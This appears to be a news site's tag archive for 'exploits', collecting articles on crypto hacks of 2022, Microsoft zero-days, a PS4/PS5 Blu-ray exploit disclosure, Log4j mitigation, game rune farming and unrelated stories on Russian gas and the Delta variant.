- Diablo 4 devs are embracing “broken” exploits but players aren’t convinced CharlieINTEL.com
- Diablo 4 head says Blizzard will “embrace,” not insta-nerf, busted stuff like Ball Lightning Sorcerers: “Just let ’em have fun, we’ll deal with it later” Yahoo Entertainment
- Diablo 4 dev will “embrace” OP aspects: “let them have their fun” Dexerto
- Diablo IV GM Says Overpowered Builds Can Be Really, Really Fun, and Won’t Be Fixed Until Later Wccftech
- Diablo general manager wants people to have fun with busted builds Gamereactor UK
Tag Archives: exploits
Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits – Forbes
- Windows Users Urged To Update As Microsoft Confirms New Zero-Day Exploits Forbes
- Microsoft Patch Tuesday Fixes 132 Vulnerabilities, Addresses 6 Zero-Days ExtremeTech
- CISA gives US civilian agencies until August 1 to resolve four Microsoft vulnerabilities The Record from Recorded Future News
- Indian Computer Emergency Response Team (CERT-In) issues warning of critical vulnerability in Microsoft products, posing security risk OnMSFT.com
- Microsoft’s latest Patch Tuesday addresses 6 actively exploited zero-day vulnerabilities TechSpot
- View Full Coverage on Google News
Crypto exploits the gray area between securities and commodities regulation, says actor Ben McKenzie – CNBC Television
- Crypto exploits the gray area between securities and commodities regulation, says actor Ben McKenzie CNBC Television
- SEC Tweet On Coinbase Gets Pounced On By Mark Cuban — Financial Scams ‘Every Minute’ On Twitter, But Not Benzinga
- Mark Cuban Takes Aim At Jim Cramer’s Crypto Criticism Amidst SEC Actions CoinGape
- Bitcoin whipsaws after SEC sues Coinbase and Binance in two-day span: CNBC Crypto World CNBC Television
- SEC sues Binance and founder CZ, and JPMorgan turns to blockchain in India: CNBC Crypto World CNBC Television
- View Full Coverage on Google News
The 10 largest crypto hacks and exploits in 2022 saw $2.1B stolen
It’s been a turbulent year for the cryptocurrency industry — market prices have taken a huge dip, crypto giants have collapsed and billions have been stolen in crypto exploits and hacks.
It was not even halfway through October when Chainalysis declared 2022 to be the “biggest year ever for hacking activity.”
As of Dec. 29, the 10 largest exploits of 2022 have seen $2.1 billion stolen from crypto protocols. Below are those exploits and hacks, ranked from smallest to largest.
10: Beanstalk Farms exploit — $76M
Stablecoin protocol Beanstalk Farms suffered a $76 million exploit on April 18 from an attacker using a flash loan to buy governance tokens. This was used to pass two proposals that inserted malicious smart contracts.
The exploit was initially thought to have cost around $182 million as Beanstalk was drained of all its collateral but in the end, the attacker only managed to get away with less than half that.
9: Qubit Finance bridge exploit — $80M
Qubit Finance, a decentralized finance (DeFi) protocol on BNB Smart Chain, had over $80 million worth of BNB (BNB) stolen on Jan. 28 in a bridge exploit.
The attacker duped the protocol’s smart contract into believing they had deposited collateral that allowed them to mint an asset representing bridged Ether (ETH).
They repeated this multiple times and borrowed multiple cryptocurrencies against the unbacked bridged ETH, draining the protocol’s funds.
8: Rari Fuse exploit — $79.3M
Another DeFi protocol called Rari Capital was exploited on April 30 for the sum of roughly $79.3 million.
The attacker exploited a reentrancy vulnerability in the protocol’s Rar Fuse liquidity pool smart contracts, making them call a function to a malicious contract to drain the pools of all crypto.
In September, Tribe DAO, which includes Rari Capital and other DeFi protocols, voted to reimburse affected users from the hack.
7: Harmony bridge hack — $100M
In yet another bridge hack, the Horizon Bridge that links Ethereum, Bitcoin (BTC), and BNB Chain to Harmony’s layer-1 blockchain was drained of around $100 million in multiple cryptocurrencies.
Blockchain forensics firm Elliptic pinned the hack on North Korean cybercriminal syndicate Lazarus Group, as the funds were laundered in a similar way to other known Lazarus attacks.
Lazarus is understood to have targeted Harmony employee login credentials, breaching the platform’s security system and gaining control of the protocol before deploying automated laundering programs to move their ill-gotten gains.
6: BNB Chain bridge exploit — $100M
The BNB Chain was paused on Oct. 6 due to “irregular activity” on the network, which later was revealed as an exploit that drained around $100 million from its cross-chain bridge, the BSC Token Hub.
Initially, it was thought the attacker was able to take around $600 million due to a vulnerability that allowed the creation of roughly two million BNB, the chain’s native token.
Unfortunately for the attacker, they had roughly over $400 million worth of digital assets frozen on the blockchain and more was possibly stuck in cross-chain bridges on the BNB blockchain side.
5: Wintermute hack — $160M
United Kingdom based crypto market-maker Wintermute suffered from a compromised hot wallet that saw approximately $160 million across 70 tokens transferred out of the wallet.
Analysis from blockchain cybersecurity firm CertiK claimed a vulnerable private key was attacked that was likely generated by Profanity — an app that allows users to generate vanity crypto addresses, that has a known exploit.
According to CertiK, this allowed the attacker to use a function with the private key that allowed the hacker to change the platform’s swap contract to the hacker’s own.
Conspiracy theories alleging the hack was an “inside job” due to how it was carried out were debunked by blockchain security firm BlockSec, who said the allegations were “not convincing enough.”
4: Nomad token bridge exploit — 190M
On Aug. 2, the Nomad token bridge, which allows users to swap cryptocurrencies across multiple blockchains, was drained by multiple attackers to the tune of $190 million.
A smart contract vulnerability that failed to properly validate transaction inputs was the cause of the exploit.
Multiple users, seemingly both malicious and benevolent, were able to copy the original attacker’s moves to funnel funds to themselves. Around 88% of addresses taking part in the exploit were identified as “copycats” in a report.
Only around $32.6 million worth of funds were able to be intercepted and returned to the protocol by white hat hackers.
3: Wormhole bridge exploit — $321M
The Wormhole token bridge suffered an exploit on Feb. 2 that resulted in the loss of 120,000 Wrapped Ether (wETH) tokens worth $321 million.
Wormhole allows users to send and receive crypto between multiple blockchains. An attacker found a vulnerability in the protocol’s smart contract and was able to mint 120,000 wETH on Solana (SOL) unbacked by collateral and was then able to swap this for ETH.
At the time it was marked as the largest exploit in 2022 and is the third-largest protocol loss overall for the year.
2: FTX wallet hack — $477 million
During the start of FTX’s bankruptcy proceedings on Nov. 11 and 12, a series of unauthorized transactions took place at the exchange, with Elliptic suggesting that around $477 million worth of crypto was stolen.
Sam Bankman-Fried said in a Nov. 16 interview that he believed it was “either an ex-employee or somewhere someone installed malware on an ex-employee’s computer” and had narrowed the perpetrator down to eight people before he was shut out of the company’s systems.
Related: 7 biggest crypto collapses of 2022 the industry would like to forget
According to reports, on Dec. 27 the United States Department of Justice launched an investigation into the whereabouts of around $372 million of the missing crypto.
1: Ronin bridge hack — $612M
The largest exploit to take place in 2022 happened on March 23, when the Ronin bridge was exploited for around $612 million — 173,600 ETH and 25.5 million USD Coin (USDC).
Ronin is an Ethereum sidechain built for Axie Infinity, a play-to-earn nonfungible token (NFT) game. Sky Mavis, Axie Infinity’s developers, said the hackers gained access to private keys, compromised validator nodes and approved transactions that drained funds from the bridge.
The U.S. Treasury Department updated its Specially Designated Nationals and Blocked Persons (SDN) list on April 14 to reflect the possibility that Lazarus Group was behind the bridge’s exploit.
The Ronin bridge hack is the largest cryptocurrency exploit to ever take place.
Saylor gets sued, FBI warns about DeFi exploits, and Crypto.com drops $495M sponsorship: Hodler’s Digest, Aug. 28
Coming every Saturday, Hodler’s Digest will help you track every single important news story that happened this week. The best (and worst) quotes, adoption and regulation highlights, leading coins, predictions and much more — a week on Cointelegraph in one link.
Top Stories This Week
DC Attorney General sues Michael Saylor and MicroStrategy for tax evasion
MicroStrategy co-founder Michael Saylor faces charges of evading United States income taxes he allegedly incurred while living in Washington, DC. The office of the region’s attorney general, Karl Racine, has sued Saylor and MicroStrategy on claims that the firm helped Saylor evade over $25 million in DC income tax. The charges, stemming in part from an amendment to DC’s False Claims Act encouraging whistleblowers to report tax evasion, mean Saylor could see $75 million in penalties.
Crypto.com backs out of $495M sponsorship deal with UEFA Champions League: Report
Crypto.com has decided not to go through with a $495 million sponsorship agreement in response to possible regulatory issues. The sponsorship deal with the Union of European Football Associations (UEFA) would have seen Crypto.com advertised in the UEFA Champions League for five seasons. The crypto exchange was reportedly in sponsorship talks after the Champions League removed Gazprom, an energy company owned by the Russian state, as a sponsor. Crypto.com already has several high-profile advertising efforts under its belt, such as a commercial starring American actor Matt Damon.
Indonesia plans to set up its crypto bourse by the end of 2022
Indonesia could have a crypto bourse, also known as a crypto exchange, constructed by its government before 2023 arrives. Initially unveiled in late 2021, the crypto bourse’s completion has taken longer than expected, but the government aims to get things right instead of rushing a launch. “We will make sure that every requirement, procedure and the necessary steps have been taken,” Jerry Sambuaga, Indonesia’s deputy trade minister, told DealStreetAsia.
Tether requests Roche Freedman to be booted from class action
Tether and Bitfinex are still locked in a lawsuit that began in 2019 alleging that the USDT stablecoin was used to manipulate the cryptocurrency market. The legal team for Tether and Bitfinex is seeking that the plaintiff‘s legal counsel, the law firm Roche Freedman, be let go from the case due to the firm’s involvement with Kyle Roche — the subject of a recent CryptoLeaks video claiming he misused privileged information to “harm” Ava Labs competitors in exchange for AVAX tokens. Kyle Roche recently moved to dismiss himself from multiple legal cases, including the one involving defendant Bitfinex and Tether. However, the defendant still wants the Roche Freedman firm out of the lawsuit completely, in addition to requesting that their private information be destroyed or returned by Roche Freedman.
Central African Republic court says new $60,000 citizenship-by-crypto-investment program is unconstitutional
In July, the Central African Republic (CAR) launched its Sango hub — a new crypto-focused initiative aimed at expanding the adoption of Bitcoin and creating a special economic zone in the Metaverse. The initiative also included the creation of a Bitcoin-backed digital asset called Sango that also allowed foreign nationals to purchase citizenship in the country for $60,000 in crypto, with an equivalent amount of Sango tokens held in collateral for five years. The CAR’s Constitutional Court deemed the efforts unconstitutional, however, noting that citizenship does not have a price tag.
Winners and Losers
At the end of the week, Bitcoin (BTC) is at $20,369, Ether (ETH) at $1,636 and XRP at $0.33. The total market cap is at $1.00 trillion, according to CoinMarketCap.
Among the biggest 100 cryptocurrencies, the top three altcoin gainers of the week are Celsius (CEL) at 36.41%, eCash (XEC) at 20.70% and Lido DAO (LDO) at 18.05%.
The top three altcoin losers of the week are Helium (HNT) at -24.47%, Avalanche (AVAX) at -10.41% and Arweave (AR) at -9.92%.
For more info on crypto prices, make sure to read Cointelegraph’s market analysis.
Most Memorable Quotations
“Building new things is not for the faint hearted.”
Neil Dundon, founder of CryptoRecruit
“Ethereum is about permissionless innovation, free enterprise, property rights, globalization.”
Ryan Berckmans, member of the Ethereum community
“We eventually came round to the idea at Coinbase that we’re going to have to be agnostic to every chain and token that is coming out. We can’t sit here in our ivory tower only focused on one asset.”
Brian Armstrong, CEO of Coinbase
“I feel that [crypto] cannot be partisan.”
Tom Emmer, member of the U.S. House of Representatives
“Most of crypto is still junk, actually. I mean, with the exception of, I would say, a few dozen tokens, everything else that has been mentioned is either noise or, frankly, it’s just gonna go away.”
Umar Farooq, head of Onyx, JPMorgan’s digital assets unit
“Cryptocurrencies have taken a life of their own outside of the distributed ledger — and this is the source of the crypto world’s problems.”
Ravi Menon, managing director of the Monetary Authority of Singapore
Prediction of the Week
Bitcoin squeeze to $23K still open as crypto market cap holds key support
For most of this week, Bitcoin could not decide whether it wanted to stay above or below $20,000, trading north and south of the level numerous times, according to Cointelegraph’s BTC price index.
In a Friday tweet, pseudonymous Twitter user “il Capo Of Crypto” noted that a possible short squeeze could occur if BTC rose above the $20,700-to-$20,800 price zone. Pending a break of this level, Bitcoin could then hit between $22,500 and $23,000. On the flip side, dropping below $19,500 would likely take the squeeze off the table, especially if the asset continued to drop below $19,000.
FUD of the Week
FBI issues alert over cybercriminal exploits targeting DeFi
This week, a public service announcement from the United States Federal Bureau of Investigation (FBI) cautioned the public over a proliferation of decentralized finance (DeFi) exploits, stating that those interested in DeFi should be careful. The agency also noted that DeFi platforms should conduct code audits to check for weaknesses. Dwarfing totals from 2020 and 2021 combined, nefarious actors have pilfered more than $1.6 billion via DeFi exploits so far in 2022 per data from CertiK, a blockchain security company.
Accomplice of ‘Cryptoqueen’ Ruja Ignatova faces extradition to US: Report
British citizen Christopher Hamilton, alleged accomplice of Ruja Ignatova, could see extradition to the U.S. thanks to a ruling from a judge in the United Kingdom. However, the move still requires approval from a U.K. government executive authority. Hamilton allegedly had a hand in the $4 billion OneCoin Ponzi scheme connected to Ruja Ignatova, aka the “Cryptoqueen.” In June, the FBI added Ignatova to the list of its ten most sought-after fugitives. Charges against Hamilton include laundering $105 million in connection to the Ponzi scheme.
Sneaky fake Google Translate app installs crypto miner on 112,000 PCs
The crypto and technology sectors are often riddled with tech traps and scams. One particular effort, ongoing since 2019, is particularly tricky. A certain type of malware named “Nitrokod” sits hidden within counterfeit computer apps and starts mining Monero (XMR), but only after a few days have passed. The malware lies within convincing versions of fake apps, such as a Google Translate app that boasts numerous positive reviews online. An official Google Translate desktop app does not even exist, however, but this malware-infused app has become a top search result. Nitrokod malware has affected over 100,000 devices spanning almost a dozen countries.
Best Cointelegraph Features
Billions are spent marketing crypto to sports fans — Is it worth it?
“Without explicit use cases tied to the massive dollars paid for sports marketing sponsorships, the branding only leads to logo exposure.”
Get ready for the feds to start indicting NFT traders
Securities and Exchange Commission regulators should move to protect investors from traders who distort the NFT market with manipulative trades — and they probably will soon.
Why interoperability is the key to blockchain technology’s mass adoption
Interoperability enables blockchain networks and protocols to communicate with each other, making it easier for everyday users to engage with blockchain technology.
More details surface on the PS4/PS5 Blu-ray exploits
PlayStation hacker TheFloW gave the scene an electroshock yesterday by revealing an exploit chain using Blu-Ray discs on the PS4 and the PS5. The security researcher stated in his disclosure that these exploits could lead to “trivial kernel exploitation” on the PS4, and pirated discs on the PS5.
Past the initial excitement, we’re left with a lot of questions, for which answers are slowly bubbling up. Here’s what we understand so far. (As always, if there’s something that you feel we got wrong, please let us know in the comments!)
I heard there was big news yesterday. Where’s the hack for my PS4/PS5?
Legendary PlayStation hacker TheFloW revealed a chain of exploits for the PS4 and the PS5 yesterday at a conference, using vulnerabilities in the Blu-Ray driver used by both consoles. Theoretically, these exploits could lead to a Jailbreak on PS4 and possibly pirated discs on the PS5, but:
Nothing’s been released that could be directly leveraged by end users. At this moment, what we have is a (quite precise) explanation of what vulnerabilities exist on the consoles, and where in the code of the firmware. Compiling all of this information into a working proof of concept for either console is “left as an exercise to the reader”. Then, assuming someone reproduces what TheFloW has described in the report (a kernel panic), this still needs to be associated with more discoveries (such as a kernel exploit) to be turned into a full fledged Jailbreak.
In other words: it could be months before something usable by the end-user comes out of this. As a good reminder, it took multiple months for seasoned hackers to release a PS4 7.55 Jailbreak after another disclosure from TheFloW back in 2021, despite the disclosure being fairly detailed.
What are the implications of this disclosure for the PS4?
Assuming an actual implementation of the exploit chain gets released:
For people running on Firmware 9.00 or lower, you can already Jailbreak your console. One could imagine that this exploit chain gets paired with existing Kernel exploits (we’re assuming here that the kernel exploit functions can be accessed from within the BD context). TheFloW has stated this exploit is 100% reliable, meaning people would expect a 100% stable Jailbreak on PS4. This would be an improvement compared to the current Jailbreaks, which sometimes require multiple retries due to the randomness of the underlying userland exploit (Webkit exploit).
For people running on Firmwares 9.03/9.04: TheFloW has stated that with this exploit chain successful, Kernel Exploitation is “trivial, as there is no SMEP and one can simply jump to user with a corrupted function pointer“. The way we’re reading this here is that implementing privilege escalation (a Jailbreak for PS4 9.03/9.04) in this context could be very easy. Take this with a pinch of salt here, what’s “trivial” to TheFloW might still require a lot of research for other people.
For people running on Firmware 9.50 or above: PlayStation have patched the security holes in 9.50 so there’s nothing for you here. Try to get your hands on a lower firmware PS4 when you get the chance. At the very least, stop updating your console if you expect to Jailbreak it.
Would this exploit mean the return of pirated discs on the PS4, and the need to burn dozens of Blu-Ray discs e.g. for homebrew or emulators?
Most likely not. The fact that the exploit uses Blu-Ray vulnerabilities to run does not limit users to this format after successful exploitation: the Blu-Ray vulnerability is the “entry point” to unlocking the console. Once a Jailbreak is active in RAM, loading homebrew (and yes, pirated games) would most likely work the same way it always has: install it on the console either via USB or FTP from one’s computer, then run it from the PS4 Hard drive.
What does this Blu-Ray exploit mean for PS5 hacking and piracy?
TheFloW initially stated in his report that this exploit chain could easily lead to pirated discs. Because this is a not a kernel exploit per se (no full access to the console), actions within the BD context would be limited, but in his report the hacker was confident that this could lead to the creation of pirated discs. The report didn’t mention whether this was for PS4 or PS5, implying both:
The UDF driver https://github.com/williamdevries/UDF is used on the PS4 and PS5 which contains a buffer overflow.[…] With these vulnerabilities, it is possible to ship pirated games on bluray discs. That is possible even without a kernel exploit as we have JIT capabilities.
He has since taken to Twitter in order to clarify this:
I wanted to clarify: Without a kernel exploit, you won’t be able to run any pirated games (which would have worked on the PS4 only anyways), because we don’t have enough RAM in the bd-j process and there are some other constraints. It was only a theoretical impact.
— Andy Nguyen (@theflow0) June 11, 2022
So, this is pretty important here, for people who thought this was going to lead to instant piracy: the path to PS5 disc piracy is not straightforward from this point, and it seems the hacker meant specifically PS4 games. It could also be that TheFloW might simply just try to cover himself legally speaking: of all the points in the disclosure, the threat of PS5 piracy is probably the least interesting from a technical level, but the most threatening for Sony’s business.
There still possibly exists a path that leads to disc piracy for the PS5 here. Whether “entrepreneurs” will figure it out quickly and start selling pirated games is anyone’s guess.
As far as hacking goes, this unlocks a pretty significant door inside the PS5’s security, that other hackers might start using to dig into the PS5’s internals. Once that breach is here, this could lead to more discoveries for tinkerers. How soon, depends on how quickly people are able to reproduce, and distribute TheFloW’s findings.
Is the PS3 impacted by these exploits, and if so what would it mean for the PS3?
The PS3 is pretty much hackable for the most part, thanks to PS3Xploit,PS3Hen, and Hybrid Firmwares, but more exploits couldn’t hurt, and might help toward full CFW for the hardware revisions that are still incompatible.
TheFloW has stated the PS3 is impacted by the exploit as well, we imagine because it uses the same driver as its younger sisters. But it’s possible he hasn’t worked on a full fledged implementation for that console, and that details need to be ironed out. Differences of implementations could mean the exploit chain isn’t working, or not easy to implement on the PS3. Zecoxao has told us people are looking into it:
we’re working on it, don’t worry 🙂
— Control_eXecute (@notzecoxao) June 11, 2022
So it’s safe to update my PS5/PS4 to X.XX then?
Well… Although TheFloW states his exploit chain was fixed on PS4 9.50 and PS5 5.00, there are other exploits lurking around on the console, that could prove to be required. A PS5 kernel exploit was patched in PS5 4.50 according to Zecoxao, and it could be key to full access to the console. The rule of thumbs remains the same: until something concrete is released, avoid updating your console. This is true for PS4 and PS5.
kernel exploit got patched in 4.50
— Control_eXecute (@notzecoxao) June 11, 2022
Stay tuned!
Elden Ring: YouTubers find rune farming exploits
When you first start Elden Ring, you don’t have much in the way of armor — at least for some classes. To put it bluntly, you are weak in a harsh world. The way that players level up and increase stats, of course, is by collecting runes. Runes are part-experience points and part currency, and to get powerful, you’ll need to collect a lot of them.
Collecting runes is something that’ll happen throughout the game, even if you aren’t particularly trying. Certain activities and enemies — like clearing guards at Gatefront Ruins — will award a bunch of runes. But if you want a lot of runes really fast, you’ll have to turn to farming. Rune farming.
Naturally, YouTube is already ablaze with some exploits and creative methods to farm runes. YouTuber TagBackTV created a video on a method that can earn players 585,600 runes per hour, he said.
He outlines the method in the video, but essentially, there’s a specific area where the player is able to trigger a boulder. The boulder will roll off the edge of a nearby cliff and gain players thousands of runes. Then you refresh back to the site of grace and do this again. And again and again and again. And there’s no fighting!
Arekkz Gaming has another video for an early Elden Ring rune farm. This one requires some fighting, however, but it’s a relatively simple process for getting lots of runes in a short amount of time. Each kill in this method grants 1,000 runes each.
Polygon, too, has a guide for Elden Ring rune farming. Our guide focuses largely on West Limgrave, the starting location for Elden Ring.
If you’re looking something that’s less like an exploit and more like an optimized route straight out of Elden Ring’s gate, Boomstick Gaming created a video with instructions for a 15-minute path to being overpowered.
Runes! Runes everywhere!
Log4j is patched, but the exploits are just getting started
Peter Membrey, chief architect of ExpressVPN, remembers vividly seeing the news of the Log4j vulnerability break online.
“As soon as I saw how you could exploit it, it was horrifying,” says Membrey. “Like one of those disaster movies where there’s a nuclear power plant, they find it’s going to melt down, but they can’t stop it. You know what’s coming, but there are very limited things you can do.”
Since the vulnerability was uncovered last week, the cybersecurity world has kicked into overdrive to identify vulnerable applications, detect potential attacks, and mitigate against exploits however possible. Nonetheless, serious hacks making use of the exploit are all but certain.
So far, researchers have observed attackers using the Log4j vulnerability to install ransomware on honeypot servers — machines that are made deliberately vulnerable for the purpose of tracking new threats. One cybersecurity firm reported that nearly half of corporate networks it was monitoring had seen attempts to exploit the vulnerability. The CEO of Cloudflare, a website and network security provider, announced early on that the threat was so bad the company would roll out firewall protection to all customers, including those who had not paid for it. But concrete news on exploitation in the wild remains scarce, likely because victims either don’t know or don’t yet want to acknowledge publicly that their systems have been breached.
What is known for sure is that the scope of the vulnerability is huge. A list of affected software compiled by the Cybersecurity and Infrastructure Security Agency (CISA) — and restricted to only enterprise software platforms — runs to more than 500 items long at time of press. A list of all affected applications would undoubtedly run to many thousands more.
Some names on the list will be familiar to the public (Amazon, IBM, Microsoft), but some of the most alarming issues have come with software that stays behind the scenes. Manufacturers like Broadcom, Red Hat, and VMware make software that enterprise clients build businesses on top of, effectively distributing the vulnerability at a core infrastructural level of many companies. This makes the process of catching and eliminating vulnerabilities all the more difficult, even after a patch for the affected library has been released.
Even by the standards of high-profile vulnerabilities, Log4Shell is hitting an unusually large chunk of the internet. It’s a reflection of the fact that the Java programming language is used widely in enterprise software, and for Java software, the Log4j library is exceedingly common.
“I ran queries in our database to see every customer who was using Log4j in any of their applications,” says Jeremy Katz, co-founder of Tidelift, a company that helps other organizations manage open-source software dependencies. “And the answer was: every single one of them that has any applications written in Java.”
The discovery of an easily exploitable bug found in a mostly enterprise-focused language is part of what analysts have called a “nearly perfect storm” around the Log4j vulnerability. Any one company could be using numerous programs containing the vulnerable library — in some cases, with multiple versions inside one application.
“Java has been around for so many years, and it’s so heavily used within companies, particularly large ones,” says Cloudflare CTO John Graham-Cumming. “This is a big moment for people who manage software within companies, and they will be running through updates and mitigations as fast as they can.”
Given the circumstances, “as fast as they can” is a very subjective term. Software updates for organizations like banks, hospitals, or government agencies are generally conducted on the scale of weeks and months, not days; typically, updates require numerous levels of development, authorization, and testing before making their way into a live application.
In the meantime, mitigations that can be pushed out quickly provide a crucial intermediary step, buying valuable time while businesses large and small scramble to identify vulnerabilities and deploy updates. That’s where fixes at the network layer have a key role to play: since malware programs communicate with their operators over the internet, measures that restrict incoming and outgoing web traffic can provide a stopgap to limit the effects of the exploit.
Cloudflare was one organization that moved quickly, Graham-Cumming explained, adding new rules for its firewall that blocked HTTP requests containing strings characteristic of the Log4j attack code. ExpressVPN also modified its product to protect against Log4Shell, updating VPN rules to automatically block all outgoing traffic on ports used by LDAP — a protocol that the exploit uses to fetch resources from remote URLs and download them onto a vulnerable machine.
“If a customer gets infected, we’ve already seen scanners as a malicious payload, so they might start scanning the internet and infect other people,” says Membrey. “We wanted to put a cap on that, not just for our customers’ sake but for everyone else’s sake — a bit like with Covid and vaccines.”
These changes typically happen faster because they take place on servers belonging to the firewall or VPN companies and require little (if any) action from the end user. In other words, an out-of-date software application could still receive a decent level of protection from an updated VPN — though it’s no substitute for proper patching.
Unfortunately, given the seriousness of the vulnerability, some systems will be compromised, even with quick fixes deployed. And it may be a long time — years even — before effects are fully felt.
“Sophisticated attackers will exploit the vulnerability, establish a persistence mechanism, and then go dark,” Daniel Clayton, vice president of global cybersecurity services at Bitdefender, says. “In two years’ time, we will hear about big breaches and then subsequently learn that they were breached two years ago.”
The bug in Log4j once more highlights the necessity and challenge of adequately funding open source projects. (A huge amount of tech infrastructure might as well depend on “a project some random person in Nebraska has been tirelessly maintaining since 2003,” as a perennially relevant XKCD comic explains.) Bloomberg reported earlier this week that many of the developers involved in the race to develop a patch for the Log4j library were unpaid volunteers, despite the global use of the software in enterprise applications.
One of the last vulnerabilities to rock the internet, Heartbleed, was similarly caused by a bug in a widely used open-source library, OpenSSL. Following that bug, tech companies like Google, Microsoft, and Facebook committed to putting more money into open source projects that were critical for internet infrastructure. But in the wake of the Log4j fallout, it’s clear that managing dependencies remains a serious security problem — and one we’re not close to solving.
“When you look at most of the big hacks that have happened over the years, it’s not normally something really sophisticated that undoes big companies,” Clayton says. “It’s something that hasn’t been patched.”
Putin exploits Europe’s energy crisis
Russia didn’t cause Europe’s current energy crisis, which has seen natural gas prices spike 5x over last year, but Vladimir Putin seems intent on using it to his advantage.
Why it matters: Gas prices fluctuate with Putin’s every word (they fell Thursday after he signaled supply would increase next month), and the supply crunch has been an uncomfortable reminder of Europe’s reliance on Russian fuel. At least one country, Moldova, is in danger of a very cold winter if Russia turns off the tap.
Driving the news: Putin recently dismissed accusations that Moscow is exploiting the crisis as “utter nonsense, drivel and politically motivated tittle-tattle.”
- The Kremlin has noted that high prices are actually a risk for Russia because countries could turn to other fuels like coal.
- But Putin is no stranger to using gas to serve geopolitical purposes, notes Anna Mikulska of Rice University’s Baker Institute, including to increase the dependence of neighboring countries on Russia or to punish countries that move toward the West.
Putin’s envoy to the EU, Vladimir Chizhov, hinted earlier this month that geopolitics were indeed a factor. “Change adversary to partner and things get resolved easier,” Chizhov said, referring to the way the bloc treats Russia.
- Putin has pushed EU countries to agree to longer-term contracts that will keep them reliant on Russian gas but, he contends, guarantee consistent supply.
- And he has claimed that one way to ease the supply crunch would be for Germany and the EU to expedite approval of the controversial Nord Stream 2 pipeline, which circumvents Ukraine (Russian gas giant Gazprom has already been shipping less gas via Ukrainian pipelines).
- The other side: Amos Hochstein, the U.S. special envoy for energy security, dismissed that suggestion, telling reporters on Monday that if Russia has the ability to increase supply, it can do so using existing pipelines.
Between the lines: It’s not clear that Russia could actually ramp up supply enough to “decrease the pain in any significant manner,” says Mikulska. “But Russia has at the very least been trying to exploit these conditions to push their own objectives.”
- Asked if Russia was using energy as a weapon, Hochstein said: “I think we are getting close to that line, if Russia indeed has the gas to supply and it chooses not to, and it will only do so if Europe accedes to other demands that are completely unrelated.”
- He added: “The only supplier that can really make a big difference for European energy security for this winter is Russia.”
The big picture: Russian gas remains a major part of the energy mix in many European countries.
- In Germany, for example, two-thirds of natural gas imports came from Russia as of 2018, and Russian gas accounted for 16% of all energy consumption.
- In several countries in Eastern Europe, 100% of natural gas supplies come from Russia.
No country is feeling the pinch more acutely than Moldova.
- The former Soviet republic has a new government that is seeking to turn away from Moscow and toward the West — but has until now been entirely reliant on Russian gas.
- Moldova’s contract expired at the end of September, at which point Gazprom raised the price and reduced supply when Moldova refused to pay it.
- The government has declared a state of emergency, said it will negotiate a new contract only if Gazprom lowers its price, and searched frantically for other suppliers — including by sealing a relatively small-scale deal with a Polish firm this week.
Zoom out: The energy crisis has a medley of causes that have little to do with Russia.
- Supply tightened due to a cold winter followed by a hot summer.
- Gas production in the EU has long been in decline, and renewables have taken a hit in part due to low winds.
- Asian demand has sucked up much of the global supply of liquefied natural gas, limiting the potential suppliers for EU countries.
The bottom line: Europe will continue to rely more on Russia for gas than any other source, the Baker Institute’s Mikulska says, for reasons of capacity, proximity and existing infrastructure.
- But rather than locking in long-term contracts with Russia, several EU countries like Poland have sought to diversify their supply or sign shorter-term agreements, Mikulska says.
- She says Putin is in danger of overplaying his hand and undermining any claim that Russia is a reliable partner.
Delta variant exploits low vaccine rates, easing of rules
The latest alarming coronavirus variant is exploiting low global vaccination rates and a rush to ease pandemic restrictions, adding new urgency to the drive to get more shots in arms and slow its supercharged spread.
The vaccines most used in Western countries still appear to offer strong protection against the highly contagious delta variant, first identified in India and now spreading in more than 90 other countries.
But the World Health Organization warned this week that the trifecta of easier-to-spread strains, insufficiently immunized populations and a drop in mask use and other public health measures before the virus is better contained will “delay the end of the pandemic.”
The delta variant is positioned to take full advantage of those weaknesses.
“Any suffering or death from COVID-19 is tragic. With vaccines available across the country, the suffering and loss we are now seeing is nearly entirely avoidable,” Dr. Rochelle Walensky, director of the Centers for Disease Control and Prevention, said Thursday in urging more Americans to roll up their sleeves ahead of the mutant’s spread.
Amid concerns about the variant, parts of Europe have reinstated travel quarantines, several Australian cities are in outbreak-sparked lockdowns — and just as Japan readies for the Olympics, some visiting athletes are infected. The mutation is causing worry even in countries with relatively successful immunization campaigns that nonetheless haven’t reached enough people to snuff out the virus.
For instance, the mutant has forced Britain, where nearly half the population is fully vaccinated, to postpone for a month its long-anticipated lifting of COVID-19 restrictions, as cases are doubling about every nine days.
In the U.S., “we’re still vulnerable for these flare-ups and rebounds,” said Dr. Hilary Babcock of Washington University at St. Louis.
The variants “are able to find any gaps in our protection,” she said, pointing to how hospital beds and intensive care units in Missouri’s least-vaccinated southwestern counties suddenly are filling — mostly with adults under 40 who never got the shots.
With nearly half the U.S. population immunized, CDC’s Walensky said about 1,000 counties, mostly in the Midwest and Southeast, with vaccination rates below 30% “are our most vulnerable.”
But the variant poses the most danger in countries where vaccinations are sparse. Africa is seeing cases rise faster than ever before, partially driven by the mutation, the WHO said Thursday, while areas in Bangladesh that border India are also seeing a variant-fueled surge. Fiji, which got through the first year of the pandemic without just two virus deaths, is now experiencing a significant outbreak blamed on the strain, and Afghanistan is desperately seeking oxygen supplies because of it.
The delta variant remains far from the only version of the coronavirus that’s spreading — and you don’t want to catch any kind. Here’s what scientists know so far:
EASIER SPREAD IS THE CHIEF THREAT
Scientists believe the delta variant is about 50% more transmissible than other types. Researchers are just beginning to tease apart why. But there are early clues that some mutations may ease a key step in how the virus slips inside human cells, said Priyamvada Acharya, a structural biologist at the Duke Human Vaccine Institute.
Still, it’s not clear if higher contagion is the whole reason the variant is spreading so quickly. In Britain, its rise followed a loosening of restrictions in May, when restaurants, gyms and other businesses reopened, and thousands of fans have attended sports events.
IS IT MORE DANGEROUS?
It’s harder to tell if the delta variant makes people sicker. British experts have said there are some preliminary signs it may increase hospitalization, but there’s no evidence it is more lethal.
It fueled a devastating COVID-19 surge in India in February, and “this time around we had a lot more people who were very sick compared to before,” said Dr. Jacob John of Christian Medical College at Vellore. But he cautioned that the “explosion” of cases didn’t necessarily mean this version was more dangerous, as more cases usually mean more hospitalizations.
THE BEST PROTECTION IS FULL VACCINATION
British researchers found two doses of either the Pfizer-BioNTech vaccine or the AstraZeneca one were only slightly less effective at blocking symptomatic illness from the delta variant than from earlier mutations — and importantly, remain hugely protective at preventing hospitalization.
But there’s an important catch: Just one dose proved far less effective against the delta variant than against earlier versions of the virus. That has prompted Britain, which originally extended the gap between doses, to speed up second shots.
There’s little information on whether the delta variant can escape other vaccines, such as ones developed in China or Russia.
